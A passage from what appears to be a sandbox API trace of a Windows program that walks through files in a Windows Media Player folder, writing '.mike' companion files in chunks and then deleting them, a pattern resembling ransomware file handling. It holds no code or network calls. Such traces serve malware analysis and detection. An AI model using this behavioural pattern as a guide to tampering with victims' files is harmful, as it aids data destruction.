(lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml.mike")) returned 1 [0100.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0100.998] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", lpFilePart=0x0) returned 0x50 [0100.998] WriteFile (in: hFile=0x288, lpBuffer=0x22c33dc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22c33dc*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.999] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0101.001] WriteFile (in: hFile=0x288, lpBuffer=0x22cb058*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22cb058*, lpNumberOfBytesWritten=0x2af104*=0xa10, lpOverlapped=0x0) returned 1 [0101.003] WriteFile (in: hFile=0x288, lpBuffer=0x22ce2b0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22ce2b0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0101.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0101.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", dwFileAttributes=0x80) returned 0 [0101.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", lpFilePart=0x0) returned 0x50 [0101.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0101.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike", lpFilePart=0x0) returned 0x55 [0101.005] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml.mike")) returned 1 [0101.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", lpFilePart=0x0) returned 0x46 [0101.008] WriteFile (in: hFile=0x288, lpBuffer=0x22d3a90*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22d3a90*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.010] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.013] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0101.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.015] SetFilePointer (in: hFile=0x288, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5000 [0101.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.015] WriteFile (in: hFile=0x288, lpBuffer=0x22f2e44*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22f2e44*, lpNumberOfBytesWritten=0x2af104*=0x360, lpOverlapped=0x0) returned 1 [0101.016] WriteFile (in: hFile=0x288, lpBuffer=0x22f6074*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22f6074*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", dwFileAttributes=0x80) returned 0 [0101.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", lpFilePart=0x0) returned 0x46 [0101.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike", lpFilePart=0x0) returned 0x4b [0101.019] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.jpg.mike")) returned 1 [0101.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.022] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.022] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", lpFilePart=0x0) returned 0x46 [0101.022] WriteFile (in: hFile=0x288, lpBuffer=0x22fb0a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22fb0a4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.023] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.028] WriteFile (in: hFile=0x288, lpBuffer=0x210f614*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x210f614*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.029] CloseHandle (hObject=0x288) returned 1 [0101.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", lpFilePart=0x0) returned 0x46 [0101.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", dwFileAttributes=0x80) returned 0 [0101.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", lpFilePart=0x0) returned 0x46 [0101.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike", lpFilePart=0x0) returned 0x4b [0101.030] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.png.mike")) returned 1 [0101.031] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp", lpFilePart=0x0) returned 0x45 [0101.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.035] WriteFile (in: hFile=0x288, lpBuffer=0x2116dcc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2116dcc*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.036] CloseHandle (hObject=0x288) returned 1 [0101.036] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.036] ReadFile (in: hFile=0x288, lpBuffer=0x2117ef8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2117ef8*, lpNumberOfBytesRead=0x2af110*=0x231f, lpOverlapped=0x0) returned 1 [0101.039] CloseHandle (hObject=0x288) returned 1 [0101.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.041] WriteFile (in: hFile=0x288, lpBuffer=0x212a274*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x212a274*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.041] CloseHandle (hObject=0x288) returned 1 [0101.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", dwFileAttributes=0x80) returned 0 [0101.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpFilePart=0x0) returned 0x45 [0101.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.043] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.mike" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.jpg.mike")) returned 1 [0101.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp", lpFilePart=0x0) returned 0x45 [0101.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.046] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.047] WriteFile (in: hFile=0x288, lpBuffer=0x2131a08*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2131a08*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0101.047] CloseHandle (hObject=0x288) returned 1 [0101.048] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0101.048] ReadFile (in: hFile=0x288, lpBuffer=0x2132b34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2132b34*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0101.049] CloseHandle (hObject=0x288) returned 1 [0101.050] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.050] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0101.051] ReadFile (in: hFile=0x288, lpBuffer=0x213fb00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x213fb00*, lpNumberOfBytesRead=0x2af110*=0x2a0, lpOverlapped=0x0) returned 1 [0101.051] CloseHandle (hObject=0x288) returned 1 [0101.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.051] WriteFile (in: hFile=0x288, lpBuffer=0x214342c*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x214342c*, lpNumberOfBytesWritten=0x2af104*=0x2a0, lpOverlapped=0x0) returned 1 [0101.051] CloseHandle (hObject=0x288) returned 1 [0101.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.052] WriteFile (in: hFile=0x288, lpBuffer=0x214665c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x214665c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0101.053] CloseHandle (hObject=0x288) returned 1 [0101.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", lpFilePart=0x0) returned 0x4a [0101.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", dwFileAttributes=0x80) returned 0 [0101.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpFilePart=0x0) returned 0x45 [0101.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Network 